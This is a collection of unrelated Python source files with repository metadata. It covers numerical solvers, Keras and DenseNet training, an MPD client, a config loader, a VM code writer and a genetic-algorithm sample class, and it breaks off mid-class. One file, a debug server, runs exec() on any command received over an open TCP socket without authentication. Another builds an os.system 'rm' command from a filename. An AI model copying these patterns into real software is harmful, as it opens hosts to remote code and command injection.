f_x_l = grad(node_flatten(node, {"x": x_prev}, "x"))(x_prev)
x_prev -= f_x / f_x_l
return {"result": x_prev}
def simple_iteration(data: dict) -> dict:
node_list = data["parse"]
equation_list = []
for i in range(node_list):
equation_list.append(str(node_list[i]))
node_list = []
try:
iterations = data["data"]["iterations"]
x0_dict = data["data"]["x_0"]
except KeyError:
raise ProjectException(color_string(Color.RED, "Key not found!(should be present x_0)"))
x0_dict_keys = list(x0_dict.keys())
assert(len(x0_dict_keys) == len(equation_list))
for i in range(len(equation_list)):
equation_list[i] = "-1 * (" + equation_list[i] + "-" + x0_dict_keys[i] + ")"
n, v = parse.parse_expression(equation_list[i])
node_list.append(n)
matrix_phi = Matrix(len(equation_list), len(x0_dict_keys))
# check convergence
for i in range(matrix_phi.rows):
for j in range(matrix_phi.columns):
matrix_phi[i][j] = grad(node_flatten(node_list[i], x0_dict, x0_dict_keys[j]))(x0_dict[x0_dict_keys[j]])
norm = max([sum([matrix_phi[i][j] for j in range(matrix_phi.columns)]) for i in range(matrix_phi.rows)])
if (norm >= 1):
return {"error" : "This equations for those basic arguments are not convergent"}
x0_dict_prev = copy(x0_dict)
for _ in range(iterations):
for i in range(len(node_list)):
x0_dict[x0_dict_keys[i]] = node_list[i].calculate(x0_dict_prev)
x0_dict_prev = copy(x0_dict)
return {"values": x0_dict_prev}
| 40.904255
| 115
| 0.640312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 720
| 0.187256
|
afbc104c7579cd278f56fcd197e11d8c1c44ade6
| 1,807
|
py
|
Python
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 5
|
2018-07-17T15:46:57.000Z
|
2020-01-18T23:54:23.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 11
|
2018-07-19T13:04:50.000Z
|
2019-10-22T13:38:01.000Z
|
TerraformToAnsibleInventory/args.py
|
mrlesmithjr/python-terraform-to-ansible-inventory
|
0ceb251c8fbdcf23d186f1a1d66684af1b28c86c
|
[
"MIT"
] | 4
|
2019-09-27T18:27:17.000Z
|
2021-12-22T13:41:03.000Z
|
import argparse
from _version import __version__
def parse():
"""Parse command line arguments."""
PARSER = argparse.ArgumentParser()
PARSER.add_argument('-b', '--backend',
help='Define which Terraform backend to parse',
choices=['local', 'consul'], default='local')
PARSER.add_argument('-cH', '--consulHost',
help='Define Consul host when using Consul backend')
PARSER.add_argument('-cKV', '--consulKV',
help='Define Consul KV Pair to query. Ex. Azure/Test')
PARSER.add_argument('-cP', '--consulPort',
help='Define Consul host port', default='8500')
PARSER.add_argument('-cS', '--consulScheme',
help='Define Consul connection scheme.',
choices=['http', 'https'], default='http')
PARSER.add_argument('-i', '--inventory', help='Ansible inventory',
default='./terraform_inventory.yml')
PARSER.add_argument('--logLevel', help='Define logging level output',
choices=['CRITICAL', 'ERROR', 'WARNING',
'INFO', 'DEBUG'], default='INFO')
PARSER.add_argument('-t', '--tfstate', help='Terraform tftstate file',
default='./terraform.tfstate')
PARSER.add_argument('-v', '--version', action='version',
version='%(prog)s {version}'.format(version=__version__))
ARGS = PARSER.parse_args()
if ARGS.backend == 'consul' and ARGS.consulHost is None:
PARSER.error('Consul host is required when using Consul backend.')
if ARGS.backend == 'consul' and ARGS.consulKV is None:
PARSER.error('Consul KV pair is required when using Consul backend')
return ARGS
| 51.628571
| 81
| 0.58052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 744
| 0.411732
|
afbcc11a19deb6b6ae32cfc779f94a2a3949f37d
| 549
|
py
|
Python
|
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
wifi_radio/lockable_mpdclient.py
|
thomasvamos/wifi_radio
|
54a04b37cfbada82074af439a7b0ee12cedf3512
|
[
"MIT"
] | null | null | null |
'''
Wrapper for a lockable MPD client
'''
from threading import Lock, Thread
from random import choice
from mpd import MPDClient
class LockableMPDClient(MPDClient):
def __init__(self, use_unicode=False):
super(LockableMPDClient, self).__init__()
self.use_unicode = use_unicode
self._lock = Lock()
def acquire(self):
self._lock.acquire()
def release(self):
self._lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, type, value, traceback):
self.release()
| 26.142857
| 49
| 0.668488
| 418
| 0.761384
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.074681
|
afbcd4f337d7fb85d3b0e527567a1d3d85e5d0ed
| 1,928
|
py
|
Python
|
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
test.py
|
raveendezoysa/American-Sign-Language-to-Text-Based-Translator
|
0e0d3bea9912c87c51f00728742dc67cd85b7e66
|
[
"MIT"
] | null | null | null |
# importing libraries
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras import backend as K
img_width, img_height = 224, 224
train_data_dir = 'v_data/train'
validation_data_dir = 'v_data/test'
nb_train_samples = 400
nb_validation_samples = 100
epochs = 10
batch_size = 16
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape = input_shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(32, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size =(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
train_datagen = ImageDataGenerator(
rescale=1. / 255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size, class_mode ='binary')
model.fit_generator(train_generator,
steps_per_epoch=nb_train_samples // batch_size,
epochs=epochs, validation_data=validation_generator,
validation_steps=nb_validation_samples // batch_size)
model.save_weights('model_saved.h5')
| 27.542857
| 67
| 0.761411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.087656
|
afbdd176b769632287834f6d6008afe844162c2f
| 245
|
py
|
Python
|
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | 7
|
2015-01-05T06:32:49.000Z
|
2020-10-30T19:29:07.000Z
|
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | null | null | null |
other/simpleOSC/sendbundle.py
|
neonkingfr/VizBench
|
e41f559cb6e761d717f2f5b202482d5d8dacd2d8
|
[
"MIT"
] | 4
|
2016-03-09T22:29:26.000Z
|
2021-04-07T13:52:28.000Z
|
import osc
osc.init()
# create and send a bundle
bundle = osc.createBundle()
osc.appendToBundle(bundle, "/test/bndlprt1", [1, 2.2, "333"])
osc.appendToBundle(bundle, "/test/bndlprt2", [4, 5.5, 6])
osc.sendBundle(bundle, "127.0.0.1", 9999)
| 24.5
| 61
| 0.677551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.302041
|
afbe04768d0e6a472f75c12cbd235fcaf4b5e777
| 2,113
|
py
|
Python
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | 2
|
2022-03-13T19:43:08.000Z
|
2022-03-14T03:19:33.000Z
|
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
intersimple-expert-rollout-setobs2.py
|
sisl/InteractionImitation
|
9c9ee8f21b53e71bbca86b0b79c6e6d913a20567
|
[
"MIT"
] | null | null | null |
import torch
import functools
from src.core.sampling import rollout_sb3
from intersim.envs import IntersimpleLidarFlatIncrementingAgent
from intersim.envs.intersimple import speed_reward
from intersim.expert import NormalizedIntersimpleExpert
from src.util.wrappers import CollisionPenaltyWrapper, Setobs
import numpy as np
from gym.wrappers import TransformObservation
obs_min = np.array([
[-1000, -1000, 0, -np.pi, -1e-1, 0.],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
[0, -np.pi, -20, -20, -np.pi, -1e-1],
]).reshape(-1)
obs_max = np.array([
[1000, 1000, 20, np.pi, 1e-1, 0.],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
[50, np.pi, 20, 20, np.pi, 1e-1],
]).reshape(-1)
def main(track:int, loc:int=0):
env = IntersimpleLidarFlatIncrementingAgent(
loc=loc,
track=track,
n_rays=5,
reward=functools.partial(
speed_reward,
collision_penalty=0
),
)
policy = NormalizedIntersimpleExpert(env, mu=0.001)
env = Setobs(TransformObservation(
CollisionPenaltyWrapper(
env,
collision_distance=6, collision_penalty=100
), lambda obs: (obs - obs_min) / (obs_max - obs_min + 1e-10)
))
print(env.nv, 'vehicles')
expert_data = rollout_sb3(env, policy, n_episodes=150, max_steps_per_episode=200)
states, actions, rewards, dones = expert_data
print(f'Expert mean episode length {(~dones).sum() / states.shape[0]}')
print(f'Expert mean reward per episode {rewards[~dones].sum() / states.shape[0]}')
print(f'Observation mean', states[~dones].mean(0))
print(f'Observation std', states[~dones].std(0))
torch.save(expert_data, f'intersimple-expert-data-setobs2-loc{loc}-track{track}.pt')
def loop(tracks:list=[0]):
for track in tracks:
main(track)
if __name__=='__main__':
import fire
fire.Fire(loop)
| 32.507692
| 88
| 0.630857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 255
| 0.120681
|
afbe9673b618fa0388c83b7abcd87db09f9c7dda
| 2,840
|
py
|
Python
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-06T08:31:46.000Z
|
2021-10-30T12:53:21.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 1
|
2021-09-07T13:53:26.000Z
|
2021-09-07T13:53:26.000Z
|
FeatureTransformation/UserInputFeatureScalling.py
|
Himanshu14k/AdultIncomePrediction_Project
|
522f170111c5e6e45ef1e26ef21f86f4ea3a8dcc
|
[
"MIT"
] | 2
|
2021-09-13T17:20:56.000Z
|
2021-11-21T16:05:16.000Z
|
from joblib import load
from pandas import DataFrame
import pickle
class FeatureScaling:
def __init__(self, user_input, logger_obj, file_obj):
try:
self.logger_obj = logger_obj
self.file_obj = file_obj
self.logger_obj.log("INFO", 'Different user input value assign process started')
self.user_input = user_input
self.Education = self.user_input['Education']
self.logger_obj.log("INFO", 'stated done')
self.Workclass = self.user_input['Workclass']
self.Age = self.user_input['Age']
self.Martial_Status = self.user_input['Martial_Status']
self.Occupation = self.user_input['Occupation']
self.Relationship = self.user_input['Relationship']
self.Race = self.user_input['Race']
self.Sex = self.user_input['Sex']
self.Final_Weight = self.user_input['Final_Weight']
self.Capital_Gain = self.user_input['Capital_Gain']
self.Capital_Loss = self.user_input['Capital_Loss']
self.Hours_Per_Week = self.user_input['Hours_Per_Week']
self.Country = self.user_input['Country']
self.X = [[self.Sex, self.Age, self.Final_Weight,
self.Education, self.Capital_Gain, self.Capital_Loss,
self.Hours_Per_Week, self.Workclass, self.Martial_Status, self.Occupation,
self.Relationship, self.Race, self.Country]]
self.logger_obj.log("INFO", 'Different user input value assign process Finished')
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during variable creation of user input to store scale data in dictionary format! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process to create variable and store user input in that variable failed.")
def Scaling(self):
"""
:DESC: This Function takes data provided by user and performs Feature Scaling.
It uses two files scale.pickle File
:return: Sends Data to perform model testing.
"""
try:
self.logger_obj.log("INFO", 'Feature Scaling process started')
self.X = DataFrame(self.X)
sc = pickle.load(open("FeatureTransformation/scale.pickle", "rb"))
self.X.iloc[:, 1:] = sc.transform(self.X.iloc[:, 1:])
self.logger_obj.log("INFO", 'Feature scaling process successfully executed!')
return self.X
except Exception as e:
self.logger_obj.log('INFO',"Exception Occurred during Process of Feature Scaling! Exception Message: " + str(e))
self.logger_obj.log('INFO',"Process of Feature scaling Failed. Exited from Scaling function of FeatureScalling class")
| 53.584906
| 171
| 0.633099
| 2,771
| 0.975704
| 0
| 0
| 0
| 0
| 0
| 0
| 1,023
| 0.360211
|
afbeec327d96ab2c12353a666a3a203a3a3bf18e
| 4,073
|
py
|
Python
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 39
|
2019-03-19T11:09:26.000Z
|
2022-03-19T12:44:47.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 34
|
2019-05-21T18:41:18.000Z
|
2022-03-27T07:30:49.000Z
|
pyShelly/debug.py
|
rfvermut/pyShelly
|
c2f27ef14d1eaf94c403858a898a919d0005d639
|
[
"MIT"
] | 42
|
2019-03-28T15:18:59.000Z
|
2021-12-27T19:16:44.000Z
|
import socket
import threading
import json
import sys
from io import StringIO
from .loop import Loop
from .const import (
LOGGER
)
class Debug_connection(Loop):
def __init__(self, parent, connection, client_address):
super(Debug_connection, self).__init__("Debug connection", parent._root)
self._debug_server = parent
self._connection = connection
self._client_address = client_address
self.state = 0
self.cmd = ''
self._locals = {'root':self._debug_server._root}
self._globals = {}
self.start_loop()
def loop_stopped(self):
try:
self._connection.close()
except:
pass
try:
self._mqt_debug_servert_server._connections.remove(self)
except:
pass
def loop(self):
if self.state == 0:
self._connection.send(b"> ")
self.state = 1
if self.state == 1:
try:
char = self._connection.recv(1).decode()
except socket.timeout:
pass
except:
LOGGER.exception("Error receiving debug command")
self.stop_loop()
if char in ['\r', '\n']:
if not self.cmd:
return
elif self.cmd == 'exit':
self.stop_loop()
else:
old_stdout = sys.stdout
redirected_output = sys.stdout = StringIO()
try:
exec(self.cmd, self._globals, self._locals)
res = redirected_output.getvalue()
self._connection.send(res.encode() + b"\r\n")
except Exception as ex:
self._connection.send(str(ex).encode() + b"\r\n")
finally:
sys.stdout = old_stdout
self.cmd = ''
self.state = 0
else:
self.cmd += char
class Debug_server(Loop):
def __init__(self, root):
super(Debug_server, self).__init__("Debug server", root)
self._root = root
self._socket = None
self._connections = []
self.start_loop()
def loop_started(self):
self._init_socket()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 7212))
sock.listen(1)
self._socket = sock
def loop(self):
# Wait for a connection
connection, client_address = self._socket.accept()
conn = Debug_connection(self, connection, client_address)
self._connections.append(conn)
def loop_stopped(self):
if self._socket:
self._socket.close()
# import socket
# import sys
# def main():
# host = ""
# port = 50000
# backlog = 5
# size = 1024
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.bind((host, port))
# sock.listen(backlog)
# while True:
# client, address = sock.accept()
# test.log("Client connected.")
# while True:
# data = client.recv(size).rstrip()
# if not data:
# continue
# test.log("Received command: %s" % data)
# if data == "disconnect":
# test.log("Client disconnected.")
# client.send(data)
# client.close()
# break
# if data == "exit":
# test.log("Client asked server to quit")
# client.send(data)
# client.close()
# return
# test.log("Executing command: %s" % data)
# try:
# exec(data)
# except Exception, err:
# test.log("Error occured while executing command: %s" % (
# data), str(err))
| 30.62406
| 94
| 0.499386
| 2,783
| 0.68328
| 0
| 0
| 0
| 0
| 0
| 0
| 1,257
| 0.308618
|
afc0461dd64d75f8650665858aa646a390a84868
| 972
|
py
|
Python
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | 1
|
2020-10-19T08:22:50.000Z
|
2020-10-19T08:22:50.000Z
|
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
setup.py
|
AGOberprieler/allcopol
|
7fd3d8ad7c9ff8410155691d8a37fdbea7783c81
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
with open("README.md", "r") as f:
long_description = f.read()
setup(name = "allcopol",
version = "0.1.1",
description = "AllCoPol: Inferring allele co-ancestry in polyploids",
long_description = long_description,
long_description_content_type = "text/markdown",
url = "https://github.com/AGOberprieler/allcopol",
author = "Ulrich Lautenschlager",
author_email = "ulrich.lautenschlager@ur.de",
license = "MIT",
packages = find_packages(),
install_requires = [
"argparse", "biopython", "configargparse", "numpy", "scipy"
],
entry_points = {
"console_scripts": [
"allcopol=allcopol.allcopol:main",
"align_clusters=allcopol.align_clusters:main",
"create_indfile=allcopol.create_indfile:main",
"relabel_trees=allcopol.relabel_trees:main",
],
},
zip_safe = False,
python_requires = ">=3.5",
)
| 30.375
| 73
| 0.644033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.453704
|
afc04d85e4ad399b752a6a1b506501312782c229
| 2,686
|
py
|
Python
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | 9
|
2018-05-06T18:55:29.000Z
|
2018-05-06T19:13:33.000Z
|
genalg/sample.py
|
davidkant/thresholds-ga
|
78988bb1bfa1c1eb32afc24edf59e5fde2f1c212
|
[
"Apache-2.0"
] | null | null | null |
import spec
import sonicfeatures
import display
import random
import os
class Sample:
"""Keep track of samples and their stuff."""
def __init__(self, genotype, gen=0, index=0, parents=None, fitness_func=None):
self.genotype = genotype
self.phentype = None
self.fitness_func = fitness_func
self.gen = gen
self.index = index
self.parents = parents
self.mutant = False
self.score = None
self.rid = None
@classmethod
def random_sample(cls, index, randorams, spec, fitness_func=None):
"""A random Sample."""
# return cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams], index)
random_sample = cls([spec.map_spec(param, random.random()) for i in range(4) for param in randorams],
gen=0,
index=index,
parents=None,
fitness_func=fitness_func)
random_sample.phenotype = random_sample.to_phenotype(randorams, spec)
return random_sample
def to_phenotype(self, randorams, spec):
"""Map genotype [0,1] to through param spec."""
return [spec.map_spec(param, gene) for gene,param in zip(self.genotype, randorams)]
def render(self, renderer, filename='sample', verbose=True):
"""Ask rs server to render me."""
renderer.render(self, filename=filename, verbose=verbose)
return self
def render_and_do(self, renderer, do_func, func_args, filename='sample', verbose=True):
"""Render and do do_func upon completion."""
renderer.render_and_do(self, do_func, func_args, filename, verbose)
return self
def render_and_score(self, renderer, filename='sample', verbose=True):
"""Render and score fitness."""
renderer.render_and_score(self, filename, verbose)
return self
def fitness(self, renderer, deleteme=True):
"""Evalute fitness. Assume we are rendered."""
# print('{0}evaluating fitness: {1}'.format(NW_THRD, self.rid))
filename = '{0}/{1}.wav'.format(renderer.render_params['foldername'], self.filename)
fitness = self.fitness_func(filename)
print('{0}done evaluating fitness: {1}, index: {3} = {2}'.format(display.NOTIFY, self.rid, fitness, self.index))
# delete file for space
if deleteme: os.system('rm "{0}"'.format(filename))
# do this last cuz triggers stuff
self.score = fitness
return self
def __repr__(self):
return '<Sample(gen: {0.gen!r}, index: {0.index!r}, rid: {0.rid!r}, score: {0.score!r})>'.format(self)
| 40.089552
| 120
| 0.624348
| 2,611
| 0.972077
| 0
| 0
| 616
| 0.229337
| 0
| 0
| 680
| 0.253165
|
afc156258025b1022c60a512cb7371bc599d1647
| 1,709
|
py
|
Python
|
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
11/VMWriter.py
|
aadityarautela/nand2tetris
|
64768087ae5f6903beeb17a01492d68d7b2354f6
|
[
"MIT"
] | null | null | null |
import os
class VMWriter(object):
def __init__(self,fname):
self.outfile = open(fname, 'w')
def close(self):
self.outfile.close()
def write_cmd(self, cmd, arg1 = "", arg2 = ""):
self.outfile.write(cmd + " " + str(arg1) + " " + str(arg2) + "\n")
def write_push(self,seg,index):
self.write_cmd("push",seg,index)
def write_pop(self,seg,index):
self.write_cmd("pop",seg,index)
def write_arithmetic(self,cmd):
self.write_cmd(cmd)
def write_label(self,label):
self.write_cmd("label",label)
def write_goto(self,label):
self.write_cmd("goto", label)
def write_if(self,label):
self.write_cmd("if-goto", label)
def write_call(self,name,nargs):
self.write_cmd("call",name,nargs)
def write_function(self,name,nlocals):
self.write_cmd("function",name,nlocals)
def write_return(self):
self.write_cmd("return")
#Non Standard i.e. Helper
def push_const(self,val):
self.write_push('constant',val)
def push_arg(self, argnum):
self.write_push('argument', argnum)
def push_this_ptr(self):
self.write_push('pointer', 0)
def pop_this_ptr(self):
self.write_pop('pointer', 0)
def pop_that_ptr(self):
self.write_pop('pointer', 1)
def push_that(self):
self.write_push('that', 0)
def pop_that(self):
self.write_pop('that', 0)
def push_temp(self, temp_num):
self.write_push('temp', temp_num)
def pop_temp(self, temp_num):
self.write_pop('temp', temp_num)
| 25.132353
| 74
| 0.576946
| 1,696
| 0.992393
| 0
| 0
| 0
| 0
| 0
| 0
| 170
| 0.099473
|
afc24baeb3d33abb5be32b2647fa2afb09362e83
| 1,945
|
py
|
Python
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 3
|
2021-03-21T07:43:12.000Z
|
2021-07-23T11:07:55.000Z
|
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | null | null | null |
youtube_rss_subscriber/config.py
|
miquelruiz/youtube-rss-subscriber
|
0dbdb011faf910be7dfd4757cd7295b898d4297c
|
[
"WTFPL"
] | 2
|
2021-04-11T13:26:29.000Z
|
2021-07-25T18:03:34.000Z
|
from typing import Any, Dict, List, Optional, cast
from pathlib import Path
import yaml
CONFIG_FILE_NAME = "config.yml"
CONFIG_DIRS = (
Path.home() / Path(".yrs"),
Path("/etc/youtube-rss-subscriber"),
)
class Config:
_instance: Optional["Config"] = None
_config: Dict[str, Any]
_required_keys: List[str] = ["database_url"]
def __new__(cls) -> "Config":
if cls._instance is None:
cls._instance = super(Config, cls).__new__(cls)
config_file_path = None
for c in CONFIG_DIRS:
file_path = c / Path(CONFIG_FILE_NAME)
if c.is_dir() and file_path.is_file():
config_file_path = file_path
if config_file_path is None:
config_file_path = init()
with open(config_file_path, "r") as cfile:
cls._config = cast(Dict[str, Any], yaml.safe_load(cfile))
for k in cls._required_keys:
try:
cls._config[k]
except KeyError:
raise RuntimeError(f"Invalid configuration: '{k}' missing")
return cls._instance
@property
def database_url(self) -> str:
return cast(str, self._config["database_url"])
@property
def youtube_dl_opts(self) -> Dict[str, Any]:
return cast(Dict[str, Any], self._config["youtube_dl_opts"])
def init() -> Path:
config_dir = CONFIG_DIRS[0]
config_dir.mkdir(exist_ok=True)
config_file_path = config_dir / Path(CONFIG_FILE_NAME)
with open(config_file_path, "w") as cfile:
yaml.dump(
{
"database_url": f"sqlite:///{config_dir}/yrs.db",
"youtube_dl_opts": {
"outtmpl": "%(title)s-%(id)s.%(ext)s",
},
},
stream=cfile,
)
print(f"Config file created in {config_file_path}")
return config_file_path
| 28.602941
| 79
| 0.568123
| 1,183
| 0.608226
| 0
| 0
| 226
| 0.116195
| 0
| 0
| 295
| 0.151671
|
afc59e6ec8b3a8d303a471a47f51dc9d406f4096
| 222
|
py
|
Python
|
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 4
|
2019-03-11T12:38:15.000Z
|
2021-04-06T14:57:52.000Z
|
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | null | null | null |
rastervision/analyzer/__init__.py
|
carderne/raster-vision
|
915fbcd3263d8f2193e65c2cd0eb53e050a47a01
|
[
"Apache-2.0"
] | 1
|
2021-02-25T18:23:27.000Z
|
2021-02-25T18:23:27.000Z
|
# flake8: noqa
from rastervision.analyzer.analyzer import *
from rastervision.analyzer.analyzer_config import *
from rastervision.analyzer.stats_analyzer import *
from rastervision.analyzer.stats_analyzer_config import *
| 31.714286
| 57
| 0.846847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 14
| 0.063063
|
afc811788a0b3ab1c60a2765e44c7a8fefe57ab0
| 2,010
|
py
|
Python
|
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | 20
|
2021-11-08T05:43:31.000Z
|
2021-11-09T15:39:03.000Z
|
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | null | null | null |
Chest X-Ray Analysis/model.py
|
HarshShah03325/Emotion_Recognition
|
d1760bbdedc55014896f0e1c7db47ee5e5a19dae
|
[
"MIT"
] | 1
|
2021-10-31T02:53:05.000Z
|
2021-10-31T02:53:05.000Z
|
from tensorflow.keras.applications.densenet import DenseNet121
from tensorflow.keras.layers import Dense, GlobalAveragePooling2D
from tensorflow.keras.models import Model
from keras import backend as K
from settings import Settings
import numpy as np
from helper import get_train_labels, compute_class_freqs
from tensorflow.python.framework.ops import disable_eager_execution
disable_eager_execution()
settings = Settings()
def get_weighted_loss(pos_weights, neg_weights, epsilon=1e-7):
"""
Custom loss function that calculates loss based on positive and negative weights.
Weights are inversely proportional to frequencies.
returns:
weighted loss.
"""
def weighted_loss(y_true, y_pred):
loss = 0.0
for i in range(len(pos_weights)):
loss += -1 * K.mean(pos_weights[i] * y_true[:, i] * K.log(y_pred[:, i] + epsilon)) + -1 * K.mean(neg_weights[i] * (1 - y_true[:, i]) * K.log(1 - y_pred[:, i] + epsilon)) #complete this line
return loss
return weighted_loss
def denseNet():
"""
Builds and compiles the keras DenseNet model.
returns:
Untrained DenseNet model.
"""
base_model = DenseNet121(weights='./densenet.hdf5', include_top=False)
x = base_model.output
# add a global spatial average pooling layer
x = GlobalAveragePooling2D()(x)
# and a logistic layer
predictions = Dense(len(settings.labels), activation="sigmoid")(x)
pos_weights, neg_weights = compute_class_freqs(get_train_labels())
model = Model(inputs=base_model.input, outputs=predictions)
model.compile(optimizer='adam', loss=get_weighted_loss(pos_weights, neg_weights), experimental_run_tf_function=False)
return model
def load_model():
"""
Builds keras DenseNet model and loads pretrained weights into the model.
returns:
Trained DenseNet model.
"""
model = denseNet()
model.load_weights("./pretrained_model.h5")
return model
| 30
| 201
| 0.698507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.283582
|
afcab14f17dffbf6475626aeb921c67d6e9af7bc
| 4,494
|
py
|
Python
|
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
Assets/ExpressiveRangeAnalyses/example_generator.py
|
rafaeldolfe/Mixed-initiative-Tile-based-Designer
|
9001f0e1b68ec8c9fa49d876d2cc6ec1426d1d01
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import math
import matplotlib.pyplot as plt
from numpy.lib.polynomial import poly
import pandas as pd
from matplotlib import cm
import matplotlib.patheffects as path_effects
import random
class Run:
def __init__(self, run_name, linearities, leniencies, ids):
self.run_name = run_name
self.linearities = linearities
